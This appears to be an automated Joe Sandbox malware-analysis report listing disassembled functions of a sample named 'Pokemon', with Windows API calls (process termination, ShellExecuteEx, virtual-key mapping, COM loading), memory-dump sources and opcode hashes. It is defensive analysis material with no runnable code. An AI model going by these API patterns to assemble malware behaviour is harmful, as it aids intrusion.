                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8ca57e29711363a2da6ee3bb0cb91f2a996408085b9b6307ca53369bfd6e3dd7
                                                                                                                                                                                                                                                                                      • Instruction ID: e944daaa01b992a79c18d6f5daf86ff9c347ef0254b1946dbe553119f32e43ac
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ca57e29711363a2da6ee3bb0cb91f2a996408085b9b6307ca53369bfd6e3dd7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAF02D75514A007ED2716774FC06F9E12A9AFC0771B29802CFD14D26D3EF2089834161
                                                                                                                                                                                                                                                                                      Function 00129480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00091F87
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: SelectObject.GDI32(?,00000000), ref: 00091F96
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: BeginPath.GDI32(?), ref: 00091FAD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: SelectObject.GDI32(?,00000000), ref: 00091FD6
                                                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001294AA
                                                                                                                                                                                                                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 001294BE
                                                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001294CC
                                                                                                                                                                                                                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 001294DC
                                                                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 001294EC
                                                                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 001294FC
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e4853940a721eb5a4f5dbdf0ae15e8959f197b68a08998b9eb268b1911b0bc40
                                                                                                                                                                                                                                                                                      • Instruction ID: d57d74d692c49b7ddc2bb40f7feb331f2e1a459ea6f06d9484cfaf32f8391114
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4853940a721eb5a4f5dbdf0ae15e8959f197b68a08998b9eb268b1911b0bc40
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4111B7200011DBFDF129F94EC88EEA7F6DEB08364F048021FA194A5B1C7719DA6DBA0
                                                                                                                                                                                                                                                                                      Function 000F5B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 000F5B7C
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 000F5B8D
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000F5B94
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 000F5B9C
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 000F5BB3
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 000F5BC5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 876683169d1a9fb0ceca8d37449a3006a09ede9db325f8c5dadb001ed8b67a31
                                                                                                                                                                                                                                                                                      • Instruction ID: da0ff4c9799792565996ccca646ed3dc5967a3b5eb8b694deda4f063d369df93
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 876683169d1a9fb0ceca8d37449a3006a09ede9db325f8c5dadb001ed8b67a31
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC018F75A00308BBEB109BA5AC49E5EBFB8EB48752F004065FB09A7681D6709C11CBA0
                                                                                                                                                                                                                                                                                      Function 0009327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000932AF
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 000932B7
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000932C2
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000932CD
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 000932D5
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000932DD
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 53ea7226fa5e0139d773bc18c0f1749787a70701deaacd6aa3ef01aefdd6f748
                                                                                                                                                                                                                                                                                      • Instruction ID: 602c89266009778c4dffafe269f0b08590cecb58033bd5d29411f24e937c4e46
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53ea7226fa5e0139d773bc18c0f1749787a70701deaacd6aa3ef01aefdd6f748
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                                                                      Function 000FF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000FF447
                                                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000FF45D
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 000FF46C
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000FF47B
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000FF485
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000FF48C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0107ac5feb52e6207a3672408eb6e69381dd934a737b4378a5072f9f2fa56a9b
                                                                                                                                                                                                                                                                                      • Instruction ID: 52eb8422cc64abb6d5bf1903342f120aed2be91df10ebd8b47644834e7f2dd55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0107ac5feb52e6207a3672408eb6e69381dd934a737b4378a5072f9f2fa56a9b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F03A72241158BFE7315B62EC0EEEF3B7CEFC6B11F000058FA0191490D7A46AA2D6B5
                                                                                                                                                                                                                                                                                      Function 000D34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?), ref: 000D34EF
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 000D3506
                                                                                                                                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 000D3512
                                                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 000D3521
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 000D3533
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 000D354D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 47fe5a372c4720eefd8868fc0d15011383da4b1be3154e4fda2ba3383bcac522
                                                                                                                                                                                                                                                                                      • Instruction ID: 2266e971dd4de25ea19e1d74e0e39cb6f301bbb83c122f1a6501d6b04a729b3a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47fe5a372c4720eefd8868fc0d15011383da4b1be3154e4fda2ba3383bcac522
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC014631500605FFDB605FA4EC08BEA7BB1FB08321F500161FA1AA26A0CB711EA2AB11
                                                                                                                                                                                                                                                                                      Function 000F21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000F21CC
                                                                                                                                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 000F21D8
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000F21E1
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000F21E9
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 000F21F2
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F21F9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1dd519b1644e616703c3762cf075080ff3f57220eccf43b834e013e3e6d7cc3e
                                                                                                                                                                                                                                                                                      • Instruction ID: afcae5782c1426d8f954c957c7b9924e27213579b1e7defe0daf08cdecacf3dd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dd519b1644e616703c3762cf075080ff3f57220eccf43b834e013e3e6d7cc3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EE0E5B6004105BFDB115FA1FC0D90ABF39FF49322B104220F22582870CB3294B2DB90
                                                                                                                                                                                                                                                                                      Function 000FCE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000941EA: _wcslen.LIBCMT ref: 000941EF
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000FCF99
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FCFE0
                                                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000FD047
                                                                                                                                                                                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000FD075
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 6597f645e81bb6e631f98c92c97811019412d24e6cc89dc7273aa8cac7868cf1
                                                                                                                                                                                                                                                                                      • Instruction ID: 3528caac4caa3747e09742e58c063bbcc35fd5d19618bc360f07bff9e1649d9d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6597f645e81bb6e631f98c92c97811019412d24e6cc89dc7273aa8cac7868cf1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 685121316043089BE764AF28C945BBFB7E9AF85314F040A2EFA91D3591DBB0CC09A742
                                                                                                                                                                                                                                                                                      Function 0011B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0011B903
                                                                                                                                                                                                                                                                                        • Part of subcall function 000941EA: _wcslen.LIBCMT ref: 000941EF
                                                                                                                                                                                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 0011B998
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0011B9C7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                      • String ID: <$@
                                                                                                                                                                                                                                                                                      • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                      • Opcode ID: 9a855dbacd4a4737e9534891712c36fa4143daeb1532a5df6b041407840d5864
                                                                                                                                                                                                                                                                                      • Instruction ID: 1d7d356c38fda790b3a275b325929b21c0de8a8121ae312d0874a4b3456f010a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a855dbacd4a4737e9534891712c36fa4143daeb1532a5df6b041407840d5864
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D713975A00619DFCF14DF64C495ADEBBB4BF08314F0484A9E855AB352CB74ED85CB90
                                                                                                                                                                                                                                                                                      Function 000F7B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000F7B6D
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000F7BA3
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000F7BB4
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000F7C36
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                      • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                      • Opcode ID: f6f8856f631aec4e8782cb7706e40cd5657dd7931cba3e0d7da419ba86a4b97c
                                                                                                                                                                                                                                                                                      • Instruction ID: 26f15c31ae2a21cfc62a7ad290eef73f107611a2c39b6b762f8ef28d88eb271c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6f8856f631aec4e8782cb7706e40cd5657dd7931cba3e0d7da419ba86a4b97c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA41BFB1604208EFDB15CF24D884AAA7BF9EF44310F1080ADAE099F646D7B1DD44DBE1
                                                                                                                                                                                                                                                                                      Function 00124818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001248D1
                                                                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 001248E6
                                                                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0012492E
                                                                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00124941
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: c90f7bb095430bb0984b1cccdb25b6927f1171ad6f812fbe68a6726d62313c1a
                                                                                                                                                                                                                                                                                      • Instruction ID: c1e533593c544e3fb56f58b8e5244b0793e2a0c84ebdfde53722b7326f2ea792
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c90f7bb095430bb0984b1cccdb25b6927f1171ad6f812fbe68a6726d62313c1a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9414C79A01219EFDF10CF55E884EAA7BB5FF0A328F044119F94597250D770ADA5CF60
                                                                                                                                                                                                                                                                                      Function 000F272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
